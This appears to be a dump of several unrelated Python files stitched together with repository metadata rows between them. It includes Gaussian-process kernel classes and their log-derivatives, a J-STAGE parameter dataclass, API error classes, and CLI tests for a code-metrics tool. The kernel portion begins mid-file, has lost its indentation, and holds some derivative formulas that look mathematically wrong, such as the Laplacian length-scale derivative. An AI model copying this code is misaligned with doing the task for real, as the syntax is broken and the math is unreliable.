class dRationalQuadratic_dweight(RationalQuadratic):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, alpha, ell):
super(dRationalQuadratic_dweight, self).__init__(weight, alpha, ell)
self.weight = weight
self.alpha = alpha
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 \
/ (1+ r**2/ (2*self.alpha*self.ell**2))**self.alpha
class dRationalQuadratic_dalpha(RationalQuadratic):
"""
Log-derivative in order to alpha
"""
def __init__(self, weight, alpha, ell):
super(dRationalQuadratic_dalpha, self).__init__(weight, alpha, ell)
self.weight = weight
self.alpha = alpha
self.ell = ell
def __call__(self, r):
return ((r**2/(2*self.alpha*self.ell**2*(r**2/(2*self.alpha*self.ell**2)+1))\
- np.log(r**2/(2*self.alpha*self.ell**2)+1)) \
* self.weight**2 * self.alpha) \
/ (1+r**2/(2*self.alpha*self.ell**2))**self.alpha
class dRationalQuadratic_dell(RationalQuadratic):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, alpha, ell):
super(dRationalQuadratic_dell, self).__init__(weight, alpha, ell)
self.weight = weight
self.alpha = alpha
self.ell = ell
def __call__(self, r):
return r**2 * (1+r**2/(2*self.alpha*self.ell**2))**(-1-self.alpha) \
* self.weight**2 / self.ell**2
##### RQP kernel ###############################################################
class RQP(weightFunction):
"""
Definition of the product between the exponential sine squared kernel
and the rational quadratic kernel that we called RQP kernel.
If I am thinking about this correctly, this kernel should tend to the
QuasiPeriodic kernel as alpha increases, although I am not sure we can
say it equals the QuasiPeriodic kernel in the limit as alpha tends to infinity.
Parameters:
weight = weight/amplitude of the kernel
ell_e and ell_p = aperiodic and periodic length scales
alpha = alpha of the rational quadratic kernel
P = periodic repetitions of the kernel
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(RQP, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
self.type = 'non-stationary and anisotropic'
self.derivatives = 5 #number of derivatives in this kernel
self.params_size = 5 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp(- 2*sine(pi*np.abs(r)/self.P)**2 \
/ self.ell_p**2) \
/(1+ r**2/ (2*self.alpha*self.ell_e**2))**self.alpha
class dRQP_dweight(RQP):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_dweight, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return 2 * self.weight**2 * exp(- 2*sine(pi*np.abs(r)/self.P)**2 \
/ self.ell_p**2) \
/(1+ r**2/ (2*self.alpha*self.ell_e**2))**self.alpha
class dRQP_dalpha(RQP):
"""
Log-derivative in order to alpha
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_dalpha, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return self.alpha * ((r**2 / (2*self.alpha \
*self.ell_e**2*(r**2/(2*self.alpha*self.ell_e**2)+1)) \
-np.log(r**2/(2*self.alpha*self.ell_e**2)+1)) \
*self.weight**2*exp(-2*sine(pi*np.abs(r)/self.P)**2/self.ell_p**2)) \
/(1+r**2/(2*self.alpha*self.ell_e**2))**self.alpha
class dRQP_delle(RQP):
"""
Log-derivative in order to ell_e
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_delle, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return (r**2*(1+r**2/(2*self.alpha*self.ell_e**2))**(-1-self.alpha) \
*self.weight**2 \
*exp(-2*sine(pi*np.abs(r)/self.P)**2/self.ell_p**2))/self.ell_e**2
class dRQP_dP(RQP):
"""
Log-derivative in order to P
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_dP, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return (4*pi*r*self.weight**2*cosine(pi*np.abs(r)/self.P)*sine(pi*np.abs(r)/self.P) \
*exp(-2*sine(pi*np.abs(r)/self.P)**2/self.ell_p**2)) \
/(self.ell_p**2*(1+r**2/(2*self.alpha*self.ell_e**2))**self.alpha*self.P)
class dRQP_dellp(RQP):
"""
Log-derivative in order to ell_p
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_dellp, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return (4*self.weight**2*sine(pi*np.abs(r)/self.P)**2 \
*exp(-2*sine(pi*np.abs(r)/self.P)**2/self.ell_p**2)) \
/(self.ell_p**2*(1+r**2/(2*self.alpha*self.ell_e**2))**self.alpha)
##### Cosine ###################################################################
class Cosine(weightFunction):
"""
Definition of the cosine kernel.
Parameters:
weight = weight/amplitude of the kernel
P = period
"""
def __init__(self, weight, P):
super(Cosine, self).__init__(weight, P)
self.weight = weight
self.P = P
self.type = 'non-stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * cosine(2*pi*np.abs(r) / self.P)
class dCosine_dweight(Cosine):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, P):
super(dCosine_dweight, self).__init__(weight, P)
self.weight = weight
self.P = P
def __call__(self, r):
return 2 * self.weight**2 * cosine(2*pi*np.abs(r) / self.P)
class dCosine_dP(Cosine):
"""
Log-derivative in order to P
"""
def __init__(self, weight, P):
super(dCosine_dP, self).__init__(weight, P)
self.weight = weight
self.P = P
def __call__(self, r):
return self.weight**2 * r * pi * sine(2*pi*np.abs(r) / self.P) / self.P
##### Laplacian ##############################################################
class Laplacian(weightFunction):
"""
Definition of the Laplacian kernel.
Parameters:
weight = weight/amplitude of the kernel
ell = characteristic length scale
"""
def __init__(self, weight, ell):
super(Laplacian, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp(- np.abs(r)/self.ell)
class dLaplacian_dweight(Laplacian):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dLaplacian_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * exp(- np.abs(r)/self.ell)
class dLaplacian_dell(Laplacian):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, ell):
super(dLaplacian_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return -0.5 * self.weight**2 * r * exp(- np.abs(r)/self.ell) / self.ell
##### Exponential ##############################################################
class Exponential(weightFunction):
"""
Definition of the exponential kernel. This kernel arises when
setting v=1/2 in the matern family of kernels
Parameters:
weight = weight/amplitude of the kernel
ell = characteristic length scale
"""
def __init__(self, weight, ell):
super(Exponential, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp(- np.abs(r)/self.ell)
class dExponential_dweight(Exponential):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dExponential_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
raise NotImplementedError
class dExponential_dell(Exponential):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, ell):
super(dExponential_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
raise NotImplementedError
##### Matern 3/2 ###############################################################
class Matern32(weightFunction):
"""
Definition of the Matern 3/2 kernel. This kernel arises when setting
v=3/2 in the matern family of kernels
Parameters:
weight = weight/amplitude of the kernel
ell = characteristic length scale
"""
def __init__(self, weight, ell):
super(Matern32, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 *(1.0 + np.sqrt(3.0)*np.abs(r)/self.ell) \
*np.exp(-np.sqrt(3.0)*np.abs(r) / self.ell)
class dMatern32_dweight(Matern32):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dMatern32_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 *(1.0 + np.sqrt(3.0)*np.abs(r)/self.ell) \
*np.exp(-np.sqrt(3.0)*np.abs(r) / self.ell)
class dMatern32_dell(Matern32):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, ell):
super(dMatern32_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return (sqrt(3) * r * (1+ (sqrt(3) * r) / self.ell) \
*exp(-(sqrt(3)*r) / self.ell) * self.weight**2) / self.ell \
-(sqrt(3) * r * exp(-(sqrt(3)*r) / self.ell)*self.weight**2)/self.ell
#### Matern 5/2 ################################################################
class Matern52(weightFunction):
"""
Definition of the Matern 5/2 kernel. This kernel arises when setting
v=5/2 in the matern family of kernels
Parameters:
weight = weight/amplitude of the kernel
ell = characteristic length scale
"""
def __init__(self, weight, ell):
super(Matern52, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * (1.0 + ( 3*np.sqrt(5)*self.ell*np.abs(r) \
+5*np.abs(r)**2)/(3*self.ell**2) ) \
*exp(-np.sqrt(5.0)*np.abs(r)/self.ell)
class dMatern52_dweight(Matern52):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dMatern52_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * (1.0 + ( 3*np.sqrt(5)*self.ell*np.abs(r) \
+5*np.abs(r)**2)/(3*self.ell**2) ) \
*exp(-np.sqrt(5.0)*np.abs(r)/self.ell)
class dMatern52_dell(Matern52):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, ell):
super(dMatern52_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return self.ell * ((sqrt(5)*r*(1+(sqrt(5)*r) \
/self.ell+(5*r**2)/(3*self.ell**2)) \
*exp(-(sqrt(5)*r)/self.ell)*self.weight**2) \
/self.ell**2 +(-(sqrt(5)*r)/self.ell**2-(10*r**2) \
/(3*self.ell**3)) \
*exp(-(sqrt(5)*r)/self.ell)*self.weight**2)
#### Linear ####################################################################
class Linear(weightFunction):
"""
Definition of the Linear kernel.
weight = weight/amplitude of the kernel
c = constant
"""
def __init__(self, weight, c):
super(Linear, self).__init__(weight, c)
self.weight = weight
self.c = c
self.type = 'non-stationary and anisotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r, t1, t2):
return self.weight**2 * (t1 - self.c) * (t2 - self.c)
class dLinear_dweight(Linear):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, c):
super(dLinear_dweight, self).__init__(weight, c)
self.weight = weight
self.c = c
def __call__(self, r, t1, t2):
return 2 * self.weight**2 * (t1 - self.c) * (t2 - self.c)
class dLinear_dc(Linear):
"""
Log-derivative in order to c
"""
def __init__(self, weight, c):
super(dLinear_dc, self).__init__(weight, c)
self.weight = weight
self.c = c
def __call__(self, r, t1, t2):
return self.c * (-t1 - t2 + 2*self.c) * self.weight**2
##### Gamma-exponential ########################################################
class GammaExp(weightFunction):
"""
Definition of the gamma-exponential kernel
weight = weight/amplitude
gamma = shape parameter ( 0 < gamma <= 2)
ell = length scale
"""
def __init__(self, weight, gamma, ell):
super(GammaExp, self).__init__(weight, gamma, ell)
self.weight = weight
self.gamma = gamma
self.ell = ell
self.type = 'non-stationary and anisotropic'
self.derivatives = 3 #number of derivatives in this kernel
self.params_size = 3 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp( -(np.abs(r)/self.ell)**self.gamma)
class dGammaExp_dweight(GammaExp):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, gamma, ell):
super(dGammaExp_dweight, self).__init__(weight, gamma, ell)
self.weight = weight
self.gamma = gamma
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * exp( -(np.abs(r)/self.ell)**self.gamma)
class dGammaExp_dgamma(GammaExp):
"""
Log-derivative in order to gamma
"""
def __init__(self, weight, gamma, ell):
super(dGammaExp_dgamma, self).__init__(weight, gamma, ell)
self.weight = weight
self.gamma = gamma
self.ell = ell
def __call__(self, r):
return -self.weight**2 * self.gamma * (np.abs(r)/self.ell)**self.gamma \
*np.log(np.abs(r)/self.ell) * exp(-(np.abs(r)/self.ell)**self.gamma)
class dGammaExp_dell(GammaExp):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, gamma, ell):
super(dGammaExp_dell, self).__init__(weight, gamma, ell)
self.weight = weight
self.gamma = gamma
self.ell = ell
def __call__(self, r):
return self.weight**2 * (np.abs(r)/self.ell)**self.gamma \
* self.gamma*exp(-(np.abs(r)/self.ell)**self.gamma)
##### Polynomial ##############################################################
class Polynomial(weightFunction):
"""
Definition of the polynomial kernel
weight = weight/amplitude
a = real value > 0
b = real value >= 0
c = integer value
"""
def __init__(self, weight, a, b, c):
super(Polynomial, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return self.weight**2 * (self.a * t1 * t2 + self.b)**self.c
class dPolynomial_dweight(Polynomial):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, a, b, c):
super(dPolynomial_dweight, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return 2 * self.weight**2 * (self.a * t1 * t2 + self.b)**self.c
class dPolynomial_da(Polynomial):
"""
Log-derivative in order to a
"""
def __init__(self, weight, a, b, c):
super(dPolynomial_da, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return self.weight**2 * self.a * self.c * t1 * t2 \
* (self.b + self.a * t1 * t2)**(self.c-1)
class dPolynomial_db(Polynomial):
"""
Log-derivative in order to b
"""
def __init__(self, weight, a, b, c):
super(dPolynomial_db, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return self.weight**2 * self.c * self.b \
* (self.b +self.a * t1 * t2)**(self.c-1)
class dPolynomial_dc(Polynomial):
"""
Log-derivative in order to c
"""
def __init__(self, weight, a, b, c):
super(dPolynomial_dc, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return self.weight**2 * self.c * (self.b + self.a * t1 * t2)**self.c \
* np.log(self.a * t1 * t2 + self.b)
##### END
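# A minimal usage sketch (not part of the original file): evaluating a
# kernel and one of its log-derivatives on a grid of time lags, using
# only classes defined above.
if __name__ == "__main__":
    r = np.linspace(-5.0, 5.0, 11)  # time lags t - t'
    kernel = SquaredExponential(weight=1.0, ell=2.0)
    dkernel_dell = dSquaredExponential_dell(weight=1.0, ell=2.0)
    print(kernel(r))        # kernel evaluated at each lag
    print(dkernel_dell(r))  # log-derivative with respect to ell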
| 33.152941
| 93
| 0.550068
| 4,067
| 30,998
| 3.974182
| 0.060241
| 0.090948
| 0.037431
| 0.040834
| 0.804244
| 0.786797
| 0.745777
| 0.71014
| 0.675803
| 0.650374
| 0
| 0.01926
| 0.29147
| 30,998
| 934
| 94
| 33.188437
| 0.71666
| 0.200142
| 0
| 0.629278
| 0
| 0
| 0.016794
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.207224
| false
| 0
| 0.001901
| 0.095057
| 0.412548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
990209ed802758743759275aaf265855b1eea4b4
| 373
|
py
|
Python
|
src/kgmk/jstage/paper_list/params.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
src/kgmk/jstage/paper_list/params.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
src/kgmk/jstage/paper_list/params.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
import typing
import dataclasses
# TODO get paper list
@dataclasses.dataclass
class Params():
service: typing.Final[int] = 2
pubyearfrom: typing.Optional[int] = None
pubyearto: typing.Optional[int] = None
material: typing.Optional[str] = None
issn: typing.Optional[str] = None
cdjournal: typing.Optional[int] = None
volorder: typing.Optional[int] = None
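# A minimal usage sketch (not part of the original file): building a
# Params instance and keeping only the fields that were actually set,
# e.g. to assemble request parameters for the J-STAGE API.
if __name__ == "__main__":
    params = Params(pubyearfrom=2019, pubyearto=2021)
    query = {k: v for k, v in dataclasses.asdict(params).items() if v is not None}
    print(query)  # {'service': 2, 'pubyearfrom': 2019, 'pubyearto': 2021}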
| 23.3125
| 42
| 0.731903
| 47
| 373
| 5.808511
| 0.489362
| 0.307692
| 0.249084
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003185
| 0.158177
| 373
| 15
| 43
| 24.866667
| 0.866242
| 0.050938
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0
| 1
| 0
| true
| 0
| 0.181818
| 0
| 0.909091
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
54cf8597b5093947e6e488398235ab3cf8166ad3
| 37
|
py
|
Python
|
max_ent/optim/__init__.py
|
aloreggia/sofai
|
92694f9372985c0c3a23d695f1de4c4a1fb70728
|
[
"MIT"
] | null | null | null |
max_ent/optim/__init__.py
|
aloreggia/sofai
|
92694f9372985c0c3a23d695f1de4c4a1fb70728
|
[
"MIT"
] | 1
|
2021-05-25T14:57:15.000Z
|
2021-05-25T14:57:15.000Z
|
max_ent/optim/__init__.py
|
Rahgooy/soft_constraint_irl
|
259d4e7aff5ec8efe78cfbe8b84e9285d4645618
|
[
"MIT"
] | null | null | null |
from max_ent.optim.optimizer import *
| 37
| 37
| 0.837838
| 6
| 37
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 37
| 1
| 37
| 37
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
54faad68c77f469541ee3c3368f0e14b0167a8e1
| 44
|
py
|
Python
|
facs/__init__.py
|
SciLifeLab/facs
|
4b8eeed824b2fc35989e10526249e2fc1bad90cf
|
[
"MIT"
] | 5
|
2015-01-21T16:49:38.000Z
|
2016-04-06T01:29:47.000Z
|
facs/__init__.py
|
SciLifeLab/facs
|
4b8eeed824b2fc35989e10526249e2fc1bad90cf
|
[
"MIT"
] | 3
|
2015-11-11T14:28:38.000Z
|
2015-12-17T20:39:50.000Z
|
facs/__init__.py
|
SciLifeLab/facs
|
4b8eeed824b2fc35989e10526249e2fc1bad90cf
|
[
"MIT"
] | 3
|
2015-12-17T04:11:47.000Z
|
2016-03-10T02:01:27.000Z
|
from facs._facs import build, query, remove
| 22
| 43
| 0.795455
| 7
| 44
| 4.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 44
| 1
| 44
| 44
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
071109f27d68a5c1b5cc7d653404b59ad55be94b
| 195
|
py
|
Python
|
active_semi_clustering/__init__.py
|
heriosousa/active-semi-supervised-clustering
|
8ed97c7f3bdd76cf6c03e0ca6ef56bcf27b2d399
|
[
"MIT"
] | 67
|
2018-11-09T06:59:31.000Z
|
2021-11-04T06:54:36.000Z
|
active_semi_clustering/__init__.py
|
heriosousa/active-semi-supervised-clustering
|
8ed97c7f3bdd76cf6c03e0ca6ef56bcf27b2d399
|
[
"MIT"
] | 5
|
2020-03-24T18:10:32.000Z
|
2021-06-02T01:08:20.000Z
|
active_semi_clustering/__init__.py
|
heriosousa/active-semi-supervised-clustering
|
8ed97c7f3bdd76cf6c03e0ca6ef56bcf27b2d399
|
[
"MIT"
] | 29
|
2018-10-16T15:36:28.000Z
|
2021-11-20T10:09:41.000Z
|
from .semi_supervised.labeled_data import KMeans, SeededKMeans, ConstrainedKMeans
from .semi_supervised.pairwise_constraints import COPKMeans, PCKMeans, MPCKMeans, MPCKMeansMF, MKMeans, RCAKMeans
| 97.5
| 113
| 0.871795
| 21
| 195
| 7.904762
| 0.809524
| 0.096386
| 0.216867
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071795
| 195
| 2
| 113
| 97.5
| 0.917127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0768ef20c205a8e1297fe58cbc25150f9b738c80
| 428
|
py
|
Python
|
backend/errors.py
|
89erik/localbank
|
7fcfca4ed81cabcb92a48540b8cbc4f0f028e867
|
[
"MIT"
] | null | null | null |
backend/errors.py
|
89erik/localbank
|
7fcfca4ed81cabcb92a48540b8cbc4f0f028e867
|
[
"MIT"
] | 12
|
2018-09-08T18:17:37.000Z
|
2019-03-02T10:18:05.000Z
|
backend/errors.py
|
89erik/localbank
|
7fcfca4ed81cabcb92a48540b8cbc4f0f028e867
|
[
"MIT"
] | null | null | null |
class ApiException(Exception):
pass
class Forbidden(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 403
class NotFound(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 404
class BadRequest(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 400
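# A minimal usage sketch (not part of the original file): converting any
# ApiException subclass into a status code and message, mirroring how a
# request handler might consume these classes.
if __name__ == "__main__":
    try:
        raise NotFound("no such transaction")
    except ApiException as exc:
        print(exc.status_code, exc.message)  # 404 no such transaction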
| 25.176471
| 32
| 0.658879
| 46
| 428
| 5.804348
| 0.347826
| 0.247191
| 0.213483
| 0.258427
| 0.696629
| 0.696629
| 0.696629
| 0.696629
| 0.696629
| 0.696629
| 0
| 0.028302
| 0.257009
| 428
| 17
| 33
| 25.176471
| 0.811321
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0.071429
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
4af18160b6cf71aec1f976b2a079ade28db922dc
| 4,960
|
py
|
Python
|
test/integration/test_diff.py
|
DahlitzFlorian/wily
|
069c26bff9741b49420e3cfd7b0954ac9b88cc3f
|
[
"Apache-2.0"
] | null | null | null |
test/integration/test_diff.py
|
DahlitzFlorian/wily
|
069c26bff9741b49420e3cfd7b0954ac9b88cc3f
|
[
"Apache-2.0"
] | null | null | null |
test/integration/test_diff.py
|
DahlitzFlorian/wily
|
069c26bff9741b49420e3cfd7b0954ac9b88cc3f
|
[
"Apache-2.0"
] | null | null | null |
import pathlib
from textwrap import dedent
from click.testing import CliRunner
import wily.__main__ as main
def test_diff_no_cache(tmpdir):
runner = CliRunner()
result = runner.invoke(main.cli, ["--path", tmpdir, "diff", "src/test.py"])
assert result.exit_code == 1, result.stdout
def test_diff_no_path(tmpdir):
runner = CliRunner()
result = runner.invoke(main.cli, ["--path", tmpdir, "diff"])
assert result.exit_code == 2, result.stdout
def test_diff_output(builddir):
""" Test the diff feature with no changes """
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" not in result.stdout
def test_diff_output_all(builddir):
""" Test the diff feature with no changes and the --all flag """
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py", "--all"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
def test_diff_output_bad_path(builddir):
""" Test the diff feature with no changes """
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/baz.py"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" not in result.stdout
def test_diff_output_remove_all(builddir):
""" Test the diff feature by removing all functions and classes """
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write("print(1)")
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py", "--all"]
)
assert result.exit_code == 0, result.stdout
def test_diff_output_more_complex(builddir):
""" Test the diff feature by making the test file more complicated """
complex_test = """
import abc
foo = 1
def function1():
a = 1 + 1
if a == 2:
print(1)
class Class1(object):
def method(self):
b = 1 + 5
if b == 6:
if 1==2:
if 2==3:
print(1)
"""
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write(dedent(complex_test))
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py", "--all"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
assert "- -> -" not in result.stdout
assert "-> -" not in result.stdout
assert "- ->" not in result.stdout
def test_diff_output_less_complex(builddir):
""" Test the diff feature by making the test file more complicated """
simple_test = """
import abc
foo = 1
def function1():
pass
class Class1(object):
def method(self):
pass
"""
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write(dedent(simple_test))
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py", "--all"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
assert "- -> -" not in result.stdout
assert "-> -" not in result.stdout
assert "- ->" not in result.stdout
def test_diff_output_loc(builddir):
""" Test the diff feature by making the test file more complicated """
simple_test = """print("test")"""
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write(dedent(simple_test))
runner = CliRunner()
result = runner.invoke(
main.cli,
["--debug", "--path", builddir, "diff", "src/test.py", "--metrics", "raw.loc"],
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
assert "10 -> \x1b[33m1\x1b[0m" in result.stdout # 10 -> 1 (in green)
def test_diff_output_rank(builddir):
""" Test the diff feature by making the test file more complicated """
simple_test = """print("test")"""
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write(dedent(simple_test))
runner = CliRunner()
result = runner.invoke(
main.cli,
[
"--debug",
"--path",
builddir,
"diff",
"src/test.py",
"--all",
"--metrics",
"maintainability.rank",
],
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
assert "A -> A" in result.stdout
| 29.700599
| 87
| 0.569758
| 616
| 4,960
| 4.482143
| 0.13961
| 0.065194
| 0.097791
| 0.097791
| 0.862369
| 0.854038
| 0.803332
| 0.777617
| 0.752988
| 0.752988
| 0
| 0.011277
| 0.284879
| 4,960
| 166
| 88
| 29.879518
| 0.767127
| 0.095161
| 0
| 0.581967
| 0
| 0
| 0.252534
| 0
| 0
| 0
| 0
| 0
| 0.204918
| 1
| 0.081967
| false
| 0.016393
| 0.04918
| 0
| 0.131148
| 0.040984
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
